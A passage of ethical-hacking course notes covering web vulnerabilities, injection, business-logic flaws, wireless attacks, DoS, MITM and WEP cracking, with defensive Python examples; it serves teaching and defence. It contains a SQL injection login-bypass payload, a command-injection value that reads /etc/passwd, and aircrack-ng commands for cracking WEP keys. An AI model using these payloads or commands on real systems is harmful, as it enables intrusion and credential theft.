● Netcat (Checks open ports & backdoor connections).
● SNMPwalk (Extracts SNMP info).

Chapter 3:

Evolution of Web Applications

Web applications have evolved significantly over time:

1. Static Web (Web 1.0) - Early 1990s
    ○ Simple HTML pages
    ○ No interactivity; just text and images
    ○ No authentication or user inputs
2. Dynamic Web (Web 2.0) - Late 1990s to 2000s
    ○ Server-side scripting (PHP, ASP, JSP)
    ○ Databases introduced (MySQL, PostgreSQL)
    ○ Forms and user interactions (shopping carts, login forms)
    ○ Rise of AJAX for asynchronous requests
3. Modern Web (Web 3.0 & Beyond) - 2010s to Present
    ○ Single Page Applications (SPAs) using JavaScript frameworks (React, Angular, Vue.js)
    ○ APIs (REST, GraphQL)
    ○ Cloud computing, serverless architecture
    ○ Decentralized applications (Blockchain, Web3)

Web Application Security

With web applications becoming more complex, security threats have also increased. Key
security concerns include:

1. Common Web Vulnerabilities (OWASP Top 10)
    ○ SQL Injection (SQLi)
    ○ Cross-Site Scripting (XSS)
    ○ Cross-Site Request Forgery (CSRF)
    ○ Broken Authentication & Session Management
    ○ Security Misconfigurations
    ○ Server-Side Request Forgery (SSRF)
    ○ Insecure Direct Object References (IDOR)
2. Secure Development Practices
    ○ Input validation (Sanitization, Whitelisting)
    ○ Use of security headers (CSP, X-Frame-Options, HSTS)
    ○ HTTPS (SSL/TLS encryption)
    ○ Secure authentication (MFA, OAuth, OpenID Connect)
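
The security-headers item above lists CSP, X-Frame-Options and HSTS by name. As an added example that is not part of the original notes, here is a WSGI middleware in plain Python that adds a baseline set of those headers to every response without overriding a header the application sets deliberately, plus an `audit_headers` helper that reports which ones a response is missing. The policy values in `SECURITY_HEADERS`, the `demo_app` and the `run_request` harness are constructed for this example; the values are a strict starting point to be tuned per application.

```python
from typing import Callable, Iterable, List, Tuple

Headers = List[Tuple[str, str]]

# Constructed baseline. The CSP allows only same-origin resources and forbids
# plugins and framing; HSTS pins the site to HTTPS for a year.
SECURITY_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; object-src 'none'; frame-ancestors 'none'",
    "X-Frame-Options": "DENY",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Content-Type-Options": "nosniff",
    "Referrer-Policy": "no-referrer",
}


def audit_headers(headers: Iterable[Tuple[str, str]]) -> List[str]:
    """Return the baseline headers absent from a response (names are case-insensitive)."""
    present = {name.lower() for name, _ in headers}
    return [name for name in SECURITY_HEADERS if name.lower() not in present]


def secure_headers_middleware(app: Callable) -> Callable:
    """Wrap a WSGI app so every response carries the baseline headers."""
    def wrapped(environ, start_response):
        def patched_start(status, headers, exc_info=None):
            headers = list(headers)
            for name in audit_headers(headers):
                # HSTS only means something on an HTTPS response; browsers ignore
                # it over plain HTTP, so adding it there would only hide a misconfiguration.
                if name == "Strict-Transport-Security" and environ.get("wsgi.url_scheme") != "https":
                    continue
                headers.append((name, SECURITY_HEADERS[name]))
            return start_response(status, headers, exc_info)
        return app(environ, patched_start)
    return wrapped


def demo_app(environ, start_response):
    """Constructed application that sets one security header of its own."""
    start_response("200 OK", [("Content-Type", "text/html; charset=utf-8"),
                              ("X-Frame-Options", "SAMEORIGIN")])
    return [b"<h1>hello</h1>"]


def run_request(app: Callable, scheme: str = "https") -> Tuple[str, Headers, bytes]:
    """Drive a WSGI app in-process (no server) and capture what it would send."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = list(headers)

    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": "/", "wsgi.url_scheme": scheme}
    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body


if __name__ == "__main__":
    _, bare, _ = run_request(demo_app)
    print("missing before middleware:", audit_headers(bare))
    _, hardened, _ = run_request(secure_headers_middleware(demo_app))
    print("missing after middleware:", audit_headers(hardened))
```

`audit_headers` is also usable on its own against the header list returned by any HTTP client, which turns the bullet into a check that can run in a deployment pipeline.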

Core Defense Mechanisms

To protect web applications, several defense mechanisms should be implemented:

1. Authentication & Authorization
    ○ Strong password policies, Multi-Factor Authentication (MFA)
    ○ OAuth 2.0, OpenID Connect, JWT for secure access
2. Encryption
    ○ SSL/TLS for secure communication
    ○ Hashing (bcrypt, Argon2) for password storage
3. Web Application Firewalls (WAF)
    ○ Filters malicious requests (Cloudflare WAF, AWS WAF)
4. Intrusion Detection & Prevention Systems (IDS/IPS)
    ○ Identifies anomalies and blocks attacks (Snort, Suricata)
5. Secure API Design
    ○ Rate limiting, input validation, token-based authentication
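
Item 2 above says to hash stored passwords with bcrypt or Argon2. The following added example (not from the original notes) shows what any such scheme has to do regardless of algorithm: a random per-user salt, a tunable work factor stored beside the hash, constant-time verification, and a way to tell when an old record needs re-hashing. PBKDF2-HMAC-SHA256 from Python's standard library stands in for bcrypt/Argon2, which need third-party packages; the `pbkdf2_sha256$iterations$salt$digest` record format and the function names are constructed for this example.

```python
import base64
import hashlib
import hmac
import os

# Work factor. OWASP's guidance for PBKDF2-HMAC-SHA256 is 600,000 iterations;
# the value is stored in each record so it can be raised later without breaking
# existing logins.
DEFAULT_ITERATIONS = 600_000
SCHEME = "pbkdf2_sha256"


def hash_password(password: str, iterations: int = DEFAULT_ITERATIONS) -> str:
    """Return a self-describing record: scheme$iterations$salt_b64$digest_b64."""
    salt = os.urandom(16)  # fresh per password, so equal passwords hash differently
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join([
        SCHEME,
        str(iterations),
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    ])


def verify_password(password: str, record: str) -> bool:
    """Recompute with the record's own salt and cost, then compare in constant time."""
    try:
        scheme, iterations, salt_b64, digest_b64 = record.split("$")
        if scheme != SCHEME:
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(digest_b64)
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    except (ValueError, TypeError):
        return False  # malformed record: fail closed
    return hmac.compare_digest(candidate, expected)


def needs_rehash(record: str, iterations: int = DEFAULT_ITERATIONS) -> bool:
    """True when a stored record uses a lower cost (or another scheme) than
    current policy, so the application can re-hash on the next successful login."""
    try:
        scheme, stored_iterations, _, _ = record.split("$")
        return scheme != SCHEME or int(stored_iterations) < iterations
    except ValueError:
        return True


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print(verify_password("correct horse battery staple", record))
    print(verify_password("Correct horse battery staple", record))
    print(needs_rehash(record))
```

The same four properties (unique salt, stored cost, constant-time compare, re-hash on login) are what bcrypt and Argon2 libraries give you; the difference is that their memory-hard or CPU-hard functions make each guess cost more on the GPU hardware the Hashcat entry in this document refers to.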

Managing the Application in Cybersecurity

Security is a continuous process. Key areas for managing application security:

1. Secure Deployment & Hosting
    ○ Cloud security (AWS, Azure, Google Cloud)
    ○ Regular security updates and patches
2. Security Monitoring & Logging
    ○ Log management tools (ELK Stack, Splunk)
    ○ Real-time monitoring with SIEM (Security Information and Event Management)
3. Penetration Testing & Ethical Hacking
    ○ Identifying vulnerabilities before attackers do
    ○ Using tools like Burp Suite, OWASP ZAP, Metasploit, Nmap
4. Incident Response & Disaster Recovery
    ○ Plan for DDoS attacks, data breaches
    ○ Regular security audits & compliance checks (GDPR, PCI-DSS)

1. Web Hacking (Website Hacking Techniques)


Web hacking refers to attacking web applications, websites, or web servers to gain unauthorized
access, manipulate content, or extract sensitive data. Common techniques include:

🔎 Common Web Hacking Techniques:


| Technique | Description |
|---|---|
| SQL Injection (SQLi) | Malicious SQL is injected through input fields so that it becomes part of a database query (e.g., login bypass, data dump). |
| Cross-Site Scripting (XSS) | Inserting malicious scripts into web pages viewed by other users. |
| Cross-Site Request Forgery (CSRF) | Forcing an authenticated user's browser to perform unwanted actions. |
| Directory Traversal | Accessing files/folders outside the intended directory by manipulating URL paths (e.g., ../ sequences). |
| Remote File Inclusion (RFI) / Local File Inclusion (LFI) | Abusing an include/require parameter so the server executes a script fetched from an attacker's URL (RFI) or reads and executes a local file it should not expose (LFI). |
| Cookie Manipulation | Altering cookies to bypass authentication or gain higher privileges. |
| Session Hijacking | Stealing session tokens to impersonate a user. |
| DNS Spoofing/Poisoning | Redirecting users to malicious websites by returning forged DNS answers. |

Tools Used: Burp Suite, OWASP ZAP, Nikto, SQLMap, Metasploit

2. Web Functionality (How Websites Work Technically)


Understanding how web applications function helps ethical hackers identify weak points.

🌐 Web Components:
●​ Frontend (Client-Side): HTML, CSS, JavaScript – everything a user sees​

●​ Backend (Server-Side): PHP, Python, Node.js, Java – processes data, database interaction​

●​ Databases: MySQL, PostgreSQL, MongoDB – store user data​

●​ APIs: Interfaces for communication between services​


●​ Web Servers: Apache, Nginx, IIS – deliver content to the user​

●​ Authentication Systems: OAuth, JWT, SAML – manage user sessions​

🔥 Web Application Flow:


User Request → DNS Lookup → Web Server → Database Query → Rendered Web Page →
User Interaction → Backend/API Calls → Database Update → Repeat

3. How to Block Content on the Internet (Content Filtering & Control)

Blocking harmful or unwanted content is critical for cybersecurity. Methods include:

🚫 Techniques for Blocking Content:


| Method | Description |
|---|---|
| DNS Filtering | Blocks websites at the DNS level (e.g., OpenDNS). |
| Firewall Rules | Blocking IP ranges or specific websites through firewall configurations. |
| URL Filtering | Blocks specific URLs or keywords. |
| Content Filtering Proxies | Intercept and inspect content (Squid Proxy, Websense). |
| Browser Extensions | Ad blockers and privacy extensions that block scripts/trackers. |
| ISP-level Filtering | Internet Service Providers restrict access to specific content (common in countries with heavy censorship). |
| Parental Controls | Tools to block adult or sensitive content. |

4. Web Pages through Email (Phishing & Security Risks)


Emails often contain web pages or links, making email a significant attack vector.

📩 Risks and Attack Techniques:


| Attack | Description |
|---|---|
| Phishing | Fake websites or forms linked from email to steal credentials. |
| Spear Phishing | Targeted phishing aimed at specific individuals/companies. |
| HTML Email Injection | Embedding malicious HTML or scripts in HTML emails (most mail clients refuse to run scripts, but deceptive links, tracking pixels and look-alike forms still get through). |
| Malware Attachments | Delivering malicious web pages or scripts as email attachments. |

Security Tip: Avoid clicking unknown email links or downloading attachments.

5. Web Messengers (Instant Messaging Apps on the Web)


Web messengers are chat platforms running in browsers or as web apps (e.g., WhatsApp Web,
Facebook Messenger).
💬 Security Threats in Web Messengers:
●​ Session Hijacking: Stealing active session cookies.​

●​ Man-in-the-Middle (MITM) attacks: Intercepting chat data over unsecured Wi-Fi.​

●​ XSS in Chat: Injecting scripts via message input fields.​

●​ End-to-End Encryption Bypass: Intercepting plaintext before encryption or after decryption on the endpoint itself (e.g., via malware or a compromised browser session), which no transport encryption can prevent.​

Defense: Use HTTPS, avoid public Wi-Fi, and enable two-factor authentication.

🛡 Cybersecurity Measures & Best Practices


●​ Use of Web Application Firewalls (WAF)​

●​ HTTPS Everywhere​

●​ Input Validation & Sanitization​

●​ Regular Security Testing (Penetration Testing)​

●​ Patch Management (Regular Updates)​

●​ User Awareness & Training

🌐 Final Summary (Ethical Hacking Perspective)


| Area | Target/Vulnerability | Ethical Hacking Goal |
|---|---|---|
| Web Hacking | Websites, apps, databases | Find, report, fix vulnerabilities |
| Web Functionality | HTTP/HTTPS, APIs, server logic | Understand architecture & weak points |
| Blocking Content | Unwanted/malicious sites, phishing, malware | Protect users from harmful content |
| Email Web Pages | Phishing, malware, credential theft | Educate users, filter emails, analyze attacks |
| Web Messengers | Session hijacking, XSS, MITM | Secure communication channels |

1. Unblocking Applications
🔎 What It Means:
Unblocking applications refers to bypassing restrictions that prevent an app or website from
working. This is common in networks with firewalls, web filters, or parental controls (like
schools, workplaces, or censored countries).

🔧 Techniques:
a) Proxy Servers:

●​ Use a proxy to relay traffic, hiding the destination from the restrictive firewall.​

●​ Example: Hiding the connection to YouTube behind a proxy server.​

b) VPN (Virtual Private Network):

●​ Creates an encrypted tunnel, making the traffic unreadable by firewalls.​

●​ Useful against geo-restrictions or local network restrictions.​

c) DNS Tunneling:

●​ Exploiting DNS queries to tunnel data out, bypassing content filters.​


●​ Rare but clever method for breaking out of restrictive networks.​

d) Tor Network / Onion Routing:

●​ Routes traffic through multiple nodes to anonymize and bypass restrictions.​

●​ Mostly used for privacy but can help unblock apps.​

⚠️ Ethical Note:
●​ In ethical hacking, these techniques are used for penetration testing to simulate a
malicious actor’s bypass attempt.​

●​ Illegal if used to access restricted services without permission.​

2. Code Injection (Including SQL Injection)


🔎 What It Means:
Code Injection is when an attacker injects malicious code into a vulnerable application, tricking
it into executing unintended commands. It's one of the OWASP Top 10 risks.

🔥 SQL Injection (SQLi):


📌 Definition:
Manipulating SQL queries by injecting malicious SQL code via input fields, URLs, or cookies.

📌 Example:
Input (username field): ' OR '1'='1' --

Resulting query: SELECT * FROM users WHERE username = '' OR '1'='1' --' AND password = ''

●​ '1'='1' is always true, and -- turns the rest of the line (the password check) into a comment, so the query returns rows and the login is bypassed.​


📌 Impacts:
●​ Dump database contents​

●​ Modify/delete records​

●​ Bypass authentication​

●​ Remote Code Execution (RCE) in extreme cases​

🔥 Other Code Injection Types:


a) Command Injection:

●​ Inject OS-level commands through a parameter the application passes to a shell​

●​ Example: an application runs ping <host> via a shell; supplying the host value 127.0.0.1 && cat /etc/passwd makes it execute​
ping 127.0.0.1 && cat /etc/passwd
so the attacker's second command runs with the web server's privileges.

b) Cross-Site Scripting (XSS):

●​ Injecting malicious JavaScript into web pages​

●​ Impacts: session hijacking, stealing cookies​

c) LDAP, XPath, or XML Injection:

●​ Similar concept, targeting other query languages or data parsers.​

🔧 Mitigation:
●​ Parameterized queries / prepared statements​

●​ Input validation and sanitization​

●​ Web Application Firewalls (WAF)​

●​ Least privilege database permissions


✅ 3. Attacking Application Logic (Business Logic Flaws)
🔎 What It Means:
This involves exploiting flaws in the intended functionality or workflow of an application
rather than attacking the underlying code or system.

💣 Example Scenarios:
a) Price Manipulation:

●​ Change product prices in client-side requests (e.g., modifying API call payloads).​

b) Privilege Escalation:

●​ Accessing admin functions due to poor role-based access control.​

c) Order of Operations Attack:

●​ Bypassing payment by manipulating the order of processes (e.g., calling the "Order Confirm" step before the "Payment" step has completed).​

d) Race Conditions:

●​ Exploiting timing issues in applications (e.g., double-spending in e-commerce platforms, where two simultaneous requests both pass a balance or coupon check before either one is recorded).​

e) Password Reset Flaws:

●​ Predictable reset token generation allows taking over user accounts.​

🔧 Mitigation:
●​ Threat modeling​

●​ Rigorous testing of business flows​


●​ Role-based access control​

●​ Secure session management​

●​ Logging and monitoring
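The race-condition scenario above (two requests both passing a balance check) is easy to reproduce and to fix; the following added Python example, not from the original notes, does both deterministically. A constructed Wallet holds 100 units and two threads each withdraw 100: the vulnerable method checks, then deducts, with a barrier in between that forces the interleaving an attacker gets by firing requests at the same instant; the safe method checks and deducts inside one critical section.

```python
import threading


class Wallet:
    """Constructed account used to show a time-of-check/time-of-use race on a balance check."""

    def __init__(self, balance):
        self.balance = balance
        self.lock = threading.Lock()

    def withdraw_vulnerable(self, amount, barrier):
        """Check, then deduct, with a gap between them. The barrier makes both concurrent
        requests finish the check before either deducts, reproducing the losing
        interleaving on every run instead of only when the timing happens to line up."""
        allowed = self.balance >= amount     # time of check
        barrier.wait()                       # the other request is checking here too
        if allowed:
            self.balance -= amount           # time of use, acting on a stale check
        return allowed

    def withdraw_safe(self, amount):
        """Check and deduct as one critical section, so the check cannot go stale.
        In a real service this is a database transaction (SELECT ... FOR UPDATE or a
        conditional UPDATE ... WHERE balance >= amount), not an in-process lock."""
        with self.lock:
            if self.balance >= amount:
                self.balance -= amount
                return True
            return False


def run_concurrently(fn, n=2):
    """Run fn on n threads and collect the sorted return values."""
    results = []
    threads = [threading.Thread(target=lambda: results.append(fn())) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sorted(results)


def double_spend_demo():
    """Two withdrawals of 100 from a balance of 100: the vulnerable path lets both through."""
    wallet = Wallet(100)
    barrier = threading.Barrier(2)
    outcome = run_concurrently(lambda: wallet.withdraw_vulnerable(100, barrier))
    return wallet.balance, outcome            # (-100, [True, True])


def fixed_demo():
    """Same two withdrawals through the locked path: one succeeds, one is refused."""
    wallet = Wallet(100)
    outcome = run_concurrently(lambda: wallet.withdraw_safe(100))
    return wallet.balance, outcome            # (0, [False, True])


if __name__ == "__main__":
    print("vulnerable:", double_spend_demo())
    print("fixed:     ", fixed_demo())
```

When testing a real application, the equivalent of the barrier is sending the two requests in parallel (for example with Burp Suite's request-grouping or a small script); the equivalent of the lock is whatever atomicity the server's data store provides.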

✅ Summary Table:
| Attack Type | Target | Risk Level | Impact |
|---|---|---|---|
| Unblocking Apps | Network/Firewalls | Medium | Data leaks, policy bypass |
| SQL Injection | Database | Critical | Data breach, RCE, credential theft |
| Command Injection | OS/System Shell | Critical | System compromise |
| XSS | Web Browsers | High | Session hijacking, data theft |
| App Logic Attack | Business Workflow | High | Financial loss, privilege escalation |

✅ Ethical Hacking Use:


●​ Penetration Testing: Simulating these attacks to find and patch vulnerabilities.​

●​ Bug Bounty Hunting: Reporting these issues for rewards.​

●​ Red Teaming: Emulating adversary behaviors to test real-world security readiness.​


Chapter 4:

What is WLAN?

A Wireless Local Area Network (WLAN) allows devices to connect and communicate
wirelessly within a local area (such as homes, offices, campuses) using radio signals instead of
cables. WLANs commonly operate under IEEE 802.11 standards (Wi-Fi).

🔑 Key Components:
●​ Access Point (AP): Device that connects wireless devices to a wired network.​

●​ Wireless Clients: Laptops, smartphones, IoT devices that connect to the AP.​

●​ SSID (Service Set Identifier): Name of the wireless network.​

●​ BSSID: MAC address of the access point.​

🔐 Security Protocols:
●​ WEP (Wired Equivalent Privacy): Weak, outdated protocol.​

●​ WPA/WPA2/WPA3: Successive standards. WPA (TKIP) is deprecated, WPA2 (AES-CCMP) is the common baseline, and WPA3 (SAE) is the current strongest.​

📂 Use in Ethical Hacking:


●​ Wireless LANs are common targets due to their broadcast nature.​

●​ Ethical hackers test WLANs for vulnerabilities like weak encryption, default settings, and
unauthorized access.

🛰️ Wireless Network Sniffing


🔎 What is Sniffing?
Sniffing is the process of capturing data packets traveling over a network. In wireless sniffing,
attackers monitor wireless traffic to gather sensitive information.

🔧 Tools Used:
●​ Wireshark​

●​ Kismet​

●​ Aircrack-ng suite​

●​ Acrylic Wi-Fi​

🛠️ Purpose in Ethical Hacking:


●​ Capture unencrypted data packets.​

●​ Identify active devices and SSIDs.​

●​ Monitor for sensitive information like passwords, emails, or session tokens.​

⚠️ Risks:
●​ Can expose usernames, passwords, and other personal information if the network is
unprotected or uses weak encryption.

🎭 Wireless Spoofing
🔎 What is Spoofing?
Spoofing refers to impersonating a legitimate wireless device or access point to deceive network
users.

🛠️ Types of Wireless Spoofing:


●​ MAC Spoofing: Changing your device’s MAC address to impersonate another device.​

●​ Rogue Access Point: Setting up a fake AP with the same SSID to attract clients (Evil
Twin Attack).​

●​ Deauthentication Attack: Forcing users to disconnect so they reconnect to a rogue AP.​

🔧 Tools Used:
●​ airbase-ng​

●​ MDK3​

●​ KARMA-style attacks (a technique, not a tool: the rogue AP answers any probe request, so clients auto-join; implemented by tools such as hostapd-mana)​

●​ Scapy​

🚨 Impact:
●​ Intercept sensitive information.​

●​ Launch Man-in-the-Middle (MITM) attacks.​

●​ Bypass MAC-based filtering security.

🚪 Port Scanning
🔎 What is Port Scanning?
Port scanning is the act of probing a target machine or network to identify open ports, services
running, and potential vulnerabilities.

📈 Common Port Scanning Techniques:


●​ TCP Connect Scan​

●​ SYN Scan (Half-Open)​

●​ UDP Scan​

●​ Stealth Scans (FIN, NULL, Xmas)​

🔧 Tools Used:
●​ Nmap​

●​ Netcat​
●​ Masscan​

●​ Unicornscan​

🔐 Purpose in Ethical Hacking:


●​ Map the network and identify targets.​

●​ Detect services with known vulnerabilities.​

●​ Assess the security posture of a system.
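A TCP connect scan is the simplest of the techniques listed above and needs no special privileges, so it is the one to understand first. The following added Python example (not from the original notes) implements it with a thread pool and, so that it runs offline, opens a listening socket on a loopback port of the OS's choosing for the scan to find. Port numbers and the scan window are constructed at run time.

```python
import socket
from concurrent.futures import ThreadPoolExecutor


def tcp_connect_scan(host, ports, timeout=0.5, workers=32):
    """TCP connect scan: completes a full three-way handshake on each port, so the
    target service (and its logs) see a real connection. It needs no raw-socket
    privilege, unlike a SYN (half-open) scan. Returns the open ports in ascending order."""
    def probe(port):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising, which keeps the loop simple
            return port if s.connect_ex((host, port)) == 0 else None

    with ThreadPoolExecutor(max_workers=workers) as pool:
        return sorted(p for p in pool.map(probe, ports) if p is not None)


def start_local_listener():
    """Bind a listening socket on an OS-chosen loopback port so the scan has a known open
    port to hit without touching any outside host. The kernel completes the handshake
    for queued connections even though nothing here calls accept()."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)
    return srv, srv.getsockname()[1]


def demo():
    """Scan a small window around the listener's port; returns (listener_port, open_ports)."""
    srv, port = start_local_listener()
    try:
        found = tcp_connect_scan("127.0.0.1", range(port - 5, port + 6))
    finally:
        srv.close()
    return port, found


if __name__ == "__main__":
    port, found = demo()
    print("listener on", port, "-> scan found open ports", found)
```

Against a remote host the same function works unchanged; raise the timeout for slow links and lower the worker count if the target's firewall rate-limits connections. Nmap's `-sT` is this scan; `-sS` (SYN) sends only the first packet and needs root.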

🔍 Wireless Network Probing


🔎 What is Probing?
Probing involves sending requests to detect available wireless networks and gather information
about them. Attackers can also send probe requests to see if specific networks respond.

🛠️ Types of Probing:
●​ Passive Probing: Listening to beacon frames without sending any requests.​

●​ Active Probing: Sending probe requests to trigger responses from hidden SSIDs or APs.​

🔧 Tools Used:
●​ Kismet​

●​ airodump-ng​

●​ WiFi Explorer​

🚨 Use in Cybersecurity:
●​ Identify hidden networks.​
●​ Discover connected devices and client behaviors.​

●​ Collect information for future attacks like spoofing or sniffing.

✅ Summary Table
| Concept | Purpose | Tools | Use in Ethical Hacking |
|---|---|---|---|
| WLAN Overview | Connect devices wirelessly | - | Understand how Wi-Fi networks operate and potential weaknesses |
| Sniffing | Capture data packets | Wireshark, Kismet | Monitor traffic, extract sensitive data |
| Spoofing | Impersonate devices/APs | airbase-ng, MDK3 | Perform MITM attacks, gather credentials |
| Port Scanning | Find open ports/services | Nmap, Netcat | Identify vulnerabilities for exploitation |
| Probing | Discover networks/devices | airodump-ng, Kismet | Gather intel for attacks, detect hidden SSIDs |

💻 Real-World Ethical Hacking Scenario


A penetration tester might:

1.​ Scan for open Wi-Fi networks.​

2.​ Use sniffing to collect unencrypted data.​


3.​ Identify hidden SSIDs through probing.​

4.​ Deploy a fake AP to perform spoofing.​

5.​ Use port scanning to find vulnerable services on connected devices.​

1. AP Weakness (Access Point Weaknesses)


📌 Definition:
AP Weaknesses refer to vulnerabilities in wireless access points (APs) that attackers can exploit
to compromise a wireless network.

📌 Common Weaknesses:
●​ Weak Encryption: Using outdated encryption like WEP, which is easily crackable.​

●​ Default Credentials: Many APs come with default usernames/passwords that are widely
known.​

●​ SSID Broadcasting: Broadcasting the network name makes the network trivial to find. Note that hiding the SSID is only a minor obstacle: probe requests and responses still carry it, as the probing section above describes.​

●​ Open Networks: No password protection allows anyone within range to connect.​

●​ Firmware Vulnerabilities: Outdated firmware may have unpatched security holes.​

📌 Risks:
●​ Unauthorized network access​

●​ Data interception​

●​ Network hijacking​

●​ Malware injection​

📌 Ethical Hacking Approach:


●​ Scanning for APs using tools like Airodump-ng or Kismet​

●​ Checking for weak encryption standards​

●​ Testing password strength using dictionary or brute-force attacks​

●​ Suggesting security improvements such as WPA3 (or WPA2 with a strong passphrase), current firmware and changed default credentials; disabling SSID broadcast adds little, since probing reveals the name anyway

2. Denial of Service (DoS) Attacks


📌 Definition:
A DoS attack aims to make a system, service, or network unavailable to users by overwhelming
it with traffic or exploiting vulnerabilities.

📌 Types of DoS Attacks:


●​ Volume-Based Attacks: (UDP floods, ICMP floods) consume bandwidth​

●​ Protocol Attacks: (SYN floods) exploit server resources​

●​ Application Layer Attacks: Target web servers, DNS, or APIs (e.g., HTTP GET/POST
floods)​

📌 Impact:
●​ Service disruption​

●​ Revenue loss for businesses​

●​ Damage to reputation​

📌 Ethical Hacking Approach:


●​ Using controlled tools like LOIC/HOIC (Low Orbit Ion Cannon/High Orbit Ion Cannon) in an isolated lab environment​

●​ Performing stress tests to identify system limits​


●​ Recommending defenses like:​

○​ Firewalls​

○​ Rate limiting​

○​ Load balancers​

○​ Cloud-based DDoS mitigation services (Cloudflare, AWS Shield)

3. Man-in-the-Middle (MITM) Attacks


📌 Definition:
A MITM attack occurs when an attacker secretly intercepts and possibly alters communication
between two parties who believe they are directly communicating.

📌 Techniques Used:
●​ ARP Spoofing: Manipulating the ARP table to redirect traffic​

●​ DNS Spoofing: Redirecting domain name requests to malicious websites​

●​ HTTPS Stripping: Downgrading connections from HTTPS to HTTP​

●​ Wi-Fi Eavesdropping: Setting up fake APs to intercept data​

📌 Impact:
●​ Data theft (passwords, personal info, financial data)​

●​ Session hijacking​

●​ Malware injection​

📌 Ethical Hacking Approach:


●​ Tools like Ettercap, Wireshark, Bettercap to simulate attacks​
●​ Detecting and demonstrating MITM vulnerabilities​

●​ Recommending:​

○​ TLS with strict certificate validation and HSTS (which defeats HTTPS stripping), plus end-to-end encryption for messaging​

○​ Using VPNs on untrusted networks​

○​ ARP/DNS monitoring tools (e.g., arpwatch) and DNSSEC-validating resolvers​

○​ Public key infrastructure (PKI)

4. War Driving
📌 Definition:
War Driving is the act of driving around with a laptop, smartphone, or other device to detect
unsecured wireless networks.

📌 Purpose:
●​ Identify and map vulnerable networks​

●​ Target APs with weak security for attacks​

📌 Tools Used:
●​ Kismet​

●​ NetStumbler​

●​ WiGLE (Wireless Geographic Logging Engine) for mapping APs​

●​ GPS devices to log locations​

📌 Risks:
●​ Unauthorized network access​
●​ Data interception​

●​ Further attacks like DoS or MITM​

📌 Ethical Hacking Approach:


●​ Conduct controlled war driving to identify organizational weak points​

●​ Advise businesses on:​

○​ Strong encryption (WPA3, or WPA2 with a strong passphrase)​

○​ Hiding SSIDs (low value on its own, since probing still reveals them)​

○​ Regular network audits​

○​ MAC address filtering (though not fully secure, since MAC addresses are easily spoofed)

Wireless Security Best Practices


Wireless networks are vulnerable because signals can be intercepted. Good practices reduce the
risk of unauthorized access.

🔒 1. Use Strong Encryption


●​ WPA3 (latest and most secure)​

●​ WPA2 (widely used but crackable with poor passwords)​

●​ Avoid WEP – weak and easily breakable.​

🔒 2. Strong Passwords / Passphrases


●​ Use long, complex passphrases combining uppercase, lowercase, numbers, and symbols.​

●​ Change default SSID and password.​


🔒 3. Disable WPS (Wi-Fi Protected Setup)
●​ The WPS PIN can be brute-forced online in roughly 11,000 attempts (Reaver), and many chipsets are also vulnerable to the offline Pixie Dust attack, which recovers the PIN from a single exchange.​

●​ Turn off WPS on routers.​

🔒 4. Network Segmentation
●​ Create separate networks for guests, IoT devices, and main users.​

🔒 5. Use MAC Address Filtering (Optional)


●​ Only allow known devices. Not a strong security layer as MACs can be spoofed.​

🔒 6. Regular Firmware Updates


●​ Keep your router firmware updated to patch vulnerabilities.​

🔒 7. Monitor Network Traffic


●​ Detect anomalies or unknown devices connected.

🛠 Wireless Network Software Tools (For Ethical Hacking &


Auditing)

| Tool | Purpose | Description |
|---|---|---|
| Aircrack-ng | WEP/WPA/WPA2 cracking | Suite for monitoring, attacking, testing and cracking Wi-Fi. |
| Kismet | Wireless network detector & sniffer | Captures packets, identifies networks and devices. |
| Wireshark | Packet analysis | Network protocol analyzer for packet inspection. |
| Reaver | WPS attack | Brute-forces the WPS PIN to recover the WPA/WPA2 passphrase. |
| Fern WiFi Cracker | GUI tool for WEP/WPA/WPA2 cracking | Easy for beginners, supports cracking and sniffing. |
| Bettercap | Network attacks (MITM) | Supports sniffing and wireless attacks. |
| Hashcat | Password cracking | High-speed (GPU) cracking of captured WPA handshakes and PMKIDs. |
| Wifite2 | Automated WPA/WPA2 cracking | Automates capturing handshakes and cracking. |
| Ettercap | Man-in-the-middle attack | Network sniffing and MITM for wired/wireless. |

💥 Cracking WEP (Wired Equivalent Privacy)


🔎 Why WEP is Insecure
●​ Uses RC4 with a per-packet key formed as IV || shared key, which exposes RC4's key-scheduling weaknesses.​

●​ The IV (Initialization Vector) is only 24 bits, so on a busy network it repeats within hours, and a repeated IV means a reused keystream.​

●​ Statistical analysis of enough captured packets (their IVs and first ciphertext bytes) reveals the key.​

🛠 WEP Cracking Process (Using Aircrack-ng)

1.​ Start Monitor Mode: airmon-ng start wlan0​

2.​ Scan for Target: airodump-ng wlan0mon​

3.​ Capture Packets: airodump-ng --bssid [target BSSID] -c [channel] -w wep_capture wlan0mon​

4.​ Generate IVs Faster: associate with the AP, then replay captured ARP requests so the AP answers with a stream of fresh packets, each carrying a new IV:​
aireplay-ng -1 0 -a [BSSID] -h [your MAC] wlan0mon
aireplay-ng -3 -b [BSSID] -h [your MAC] wlan0mon​

5.​ Crack the WEP Key (once tens of thousands of IVs are captured): aircrack-ng wep_capture.cap​

📌 Outcome: WEP can be cracked in minutes. The attack is statistical, not a password guess: the 24-bit IV repeats, and the RC4 key-scheduling weakness leaks key bytes from the first ciphertext bytes of many packets.
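The weakness the procedure above exploits is easiest to see on a small scale. The added Python example below (not from the original notes) implements RC4, builds a WEP per-packet key as IV || shared key, and shows that two frames encrypted under the same IV leak each other's contents: C1 XOR C2 equals P1 XOR P2, so a predictable first frame exposes the second without any key recovery. The key, IV and frame contents are constructed; the RC4 implementation is checked against the standard "Key"/"Plaintext" test vector.

```python
import math


def rc4_keystream(key, length):
    """RC4 key scheduling (KSA) followed by the keystream generator (PRGA)."""
    s = list(range(256))
    j = 0
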